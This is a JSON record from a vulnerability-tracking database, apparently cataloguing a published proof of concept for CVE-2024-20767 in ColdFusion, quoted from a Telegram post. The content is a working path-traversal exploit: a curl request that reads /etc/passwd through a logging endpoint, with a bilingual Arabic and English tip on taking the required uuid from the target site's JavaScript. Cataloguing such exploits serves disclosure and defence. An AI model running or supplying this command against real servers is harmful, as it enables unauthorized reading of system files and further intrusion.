{"uuid": "670e6988-b743-4482-8ac7-b81cf7aa51af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/Teamx1945x/4297", "content": "CVE ID : CVE-2024-20767\nSystem : \nColdFusion versions 2023/6-2021/12\nType : reading Local files\n\nExploit \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644:\n\ncurl 'exmple.com/pms?module=logging&file_name=../../../../../etc/passwd&number_of_lines=100' -H 'uuid : exmple1oei-29eodj-ndke'\n\n\u0645\u0644\u0627\u062d\u0638\u0629 : \u064a\u062a\u0645 \u0627\u062e\u0630 \u0642\u064a\u0645\u0629 uuid \u0641\u064a \u0627\u0644\u0628\u0627\u0644\u0648\u062f \u0645\u0646 \u0643\u0648\u062f javascript \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639\n\nNote : The value of uuid\u00a0 in this paylaod take it from javascript code from the targrt website\n\n#\u0627\u0633\u062a\u063a\u0644\u0627\u0644_\u062b\u063a\u0631\u0629", "creation_timestamp": "2024-04-21T09:52:23.000000Z"}